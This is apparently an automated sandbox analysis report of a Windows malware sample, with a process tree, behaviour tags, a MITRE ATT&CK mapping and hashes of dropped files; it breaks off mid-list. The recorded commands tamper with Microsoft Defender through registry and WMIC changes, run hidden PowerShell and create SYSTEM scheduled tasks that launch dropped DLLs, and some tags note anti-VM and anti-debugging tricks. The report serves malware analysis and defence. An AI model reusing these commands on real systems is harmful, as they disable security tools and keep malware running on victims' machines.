C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhpuaaonuqVoelUvgo"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lwqGFNNkU\LCxSic.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "hiXTHRxmBfdbKAP" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hiXTHRxmBfdbKAP2" /F /xml "C:\Program Files (x86)\lwqGFNNkU\gwuyhIB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hiXTHRxmBfdbKAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hiXTHRxmBfdbKAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jONrbUXsZlWKUm" /F /xml "C:\Program Files (x86)\ooaqkSSxqGyU2\wchihNA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guPXcpPQgOYTm2" /F /xml "C:\ProgramData\rNTGojywzibeDzVB\ChSyjAl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hGXSKRwbDLnsnXXXt2" /F /xml "C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\pnWlLmf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IMufzQmGSuwZQsmFOOn2" /F /xml "C:\Program Files (x86)\VsVHNYITDnqCC\friGdkQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jAFDOjCXGMQClUYnP" /SC once /ST 03:10:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TvSdAjXLYNsucLRI\MclKnVuB\hBoXjQM.dll\",#1 /Dkodidv 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jAFDOjCXGMQClUYnP"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZipJm1" /SC once /ST 17:01:17 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZipJm1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZipJm1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ltbOwrqBWDKUbrYld"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TvSdAjXLYNsucLRI\MclKnVuB\hBoXjQM.dll",#1 /Dkodidv 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TvSdAjXLYNsucLRI\MclKnVuB\hBoXjQM.dll",#1 /Dkodidv 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jAFDOjCXGMQClUYnP"3⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbf4eeab58,0x7ffbf4eeab68,0x7ffbf4eeab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3256 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3264 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3920 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4568 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4524 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4688 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2324 --field-trial-handle=1912,i,16662421847536563140,15201971105302991802,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1104 -ip 11041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4388 -ip 43881⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5876 -ip 58761⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
4Windows Service
4Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
4Virtualization/Sandbox Evasion
2Impair Defenses
2Disable or Modify System Firewall
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5ec09190d38d35283b74ee1dd61b42e0b
SHA1e9fc8deed84c3f1f9c6190d7816bc1343af53d59
SHA2567f56433d20473068db139653869187ff71c3a1578ae12969fd9b4127f597aa58
SHA512fcc2e2e0da2b5890f880c478ec1944de3c8077d0b9670cbd4500792631a268f596b547d5907058c982ae62509d586d4f7fe422581fbe8a3689bc17163d12e344
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnkFilesize
2KB
MD53116a2484910a1acf8727b7669fa7751
SHA178aa47b8dd3a4e910acc10f9ba1b1f675a5266ce
SHA256f2011bec5e3f0bd5b4054cc4ddf37263c526c3343237fc557fa79ad24dcc1b0f
SHA512bf1c83acad18593884f8e45454f58b95faa444a52bf73b9a84ba1903ab8baf50f7c9fda07a4ba7dc845d093071149d3e0a7875500085da8cf3c1e76ebd56777f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD5d0df793c4e281659228b2837846ace2d
SHA1ece0a5b1581f86b175ccbc7822483448ec728077
SHA2564e5ceefae11a45c397cde5c6b725c18d8c63d80d2ce851fa94df1644169eafc9
SHA512400a81d676e5c1e8e64655536b23dbae0a0dd47dc1e87e202e065903396e6a106770cec238093d748b9c71b5859edf097ffff2e088b5b79d6a449754140a52ad
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\milpipdiieeanckclonllbjplbpdejgm\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5cb681c847f0f1ef59529235c0221f9c4
SHA1d7beae922ab2d1c76f9340b3e0341729e2464348
SHA256270f3babe26c8650a209769a95c469694879648f0bb8f4e2b26b37ed4c4a2e06
SHA5124b185f4e56765ff870ce01cbcbccada0cf7ad4f71738e0e18e5095c9ae3b8cf5bd278a26f108945b71acbe91b877b6f5261bc74d0851efe0126688a854e28397
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD51abf2ac08ee3fb0c426d26e717458ebb
SHA1cf66449ca2d031c0abe1279c0d4ad2593df13cd0
SHA2564a75a3c9fc05d6143c9f6da364b93be4e3109d7da58fd2b63ab8399cc0afb3c6
SHA512739a1d254ded88a3f80740dd58e4a8ead6ecc7018190f59c9eabfd538e322afd1e3986f3e27236585f2f86385a26d02596407039395901ea53e54883f1c558e1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5661730fd74799746bf3efc5e7da00d8e
SHA12de5d09283d20d9e83e0796036ba23f5d0ee6207
SHA2568429a4be2c8eec6094631cf77424027c96bdee8ce8f0c55efb63f2475e9b17d0
SHA512733c1f76b7aee75443fb7458d5f9d6c21e3e0f2a4f06cc33b3992a06cb0fe7add32346ecbd6784e3457038617edf8d497c88e69097db10b37c8ccfd472cd2b15
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5589da1917d8e91c058b99ea36fd09539
SHA1f6319f16e5ee42319acfcf668656596c5744657a
SHA2564ea44af1218e006ecf694a89a3e097bc5723095073a24bfe93e72cb42fbf56f6
SHA512614f99fce80f75b0f0df15e04e42dc0a800b4641a7ac9d7572dec29c601f6ccc47f9ba4acb919fe584cc8681364892f81fdb45876df75a064be08b997ce92be3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD58a2521e5d2b9e8969a8f65da5cd75285
SHA1f31e3c685c4f2fac42841a53deb7ddebf2ea3235
SHA256ea093a237fc7287ee7e81acc23c9f5bfa92ca929ea694603b2a7dc43b12d740e
SHA512cad614b5045753cc866bd34d0a4d7d65b4fef138c048ad0af16fdae680a6468bfbae6022f3ded19b75877883c6ac6634a1f43dfb3cafdc4b031e465f636669b0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5f800d7d08ceb7559fadb999c473b123a
SHA167ba9c6b429bf552fda4823e3f106f9a234d4e8e
SHA256443d8e0e92e991d3de192dd581cb6f4c7a1149d94fbdc20def16252e9d35ec10
SHA512334931cb4d690097be78268d90673631bcfa8b0205b04529d31ae5a9ddfa3d9f53c05558b5ccf4268d51983a4bf539e203d49a7bc5c27f57ee4bb444e1e96880
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5eca3f5504bc55176dcc4c37148cc3597
SHA13e4d9f735486f23796eebe3318ea32f3e0da7bbb
SHA256689dde71ec4a0bae4ca9e7806c11158cca8d5550ad70742f4090d8f7ea1a42fd
SHA5127f64a7008c2dd4df3ac6f272ce3e659cd685d4d6010199bdbcd63e690309eb9af7929103948022b0b7a1802798f780936db00102b3121c26cd16be3766462e39
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD53fb561d6f8ec0ec1d108f452f825d795
SHA1b5fa54098b8a330304b6bb92371a3d7122967eb8
SHA2560dd6bf5542433111cf38c58d1e5ad9fb10fe2cf4082d70deabe4c94a315891be
SHA512deb0c00970e4ee4da91931d2d1f251dd233b12200e40110e2f22e88faa6c98510cf4e3a5cecdd463c3fcebd92178d75dc44dd1bbd5f535d547df9fa3aefb2ccb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD51a0f2e5e5a5c2db1276b5f7c23258aa4
SHA1bd8a021109de1e3d19ec9a9eca5b1c2ec87baad9
SHA2562201f4a987aca00e0baf76320cbee9c2c1076690bcd1b5b322a99db3774471ad
SHA512a24c2d781f445ddf5359d01015d3af3f046f48c8f8c18c7ad9e88f05b80b3a77cfd767300f2b033a544bcbe27571cff0a9aadcf806755cee46ebfea7212b76fb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD590346800aa2d1c9b7fddc474db712011
SHA1450b52eb10f49fcc455adba3352058485566c8b7
SHA256424d088c52a4b646647c8ab44800c148809e686851e18ffe7098ce406cfe16ca
SHA5129bd2dae52a351f328dd07b3af7ba3166138efc29c7e7d9485b6963cd94f85a70b30edbfb79af5ef2be29e8d679f7c6181a3f29d2d2501ae3e5b2dabe608fe065
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
690B
MD5093a607d9b0a7e39539c2568fcd6d8d0
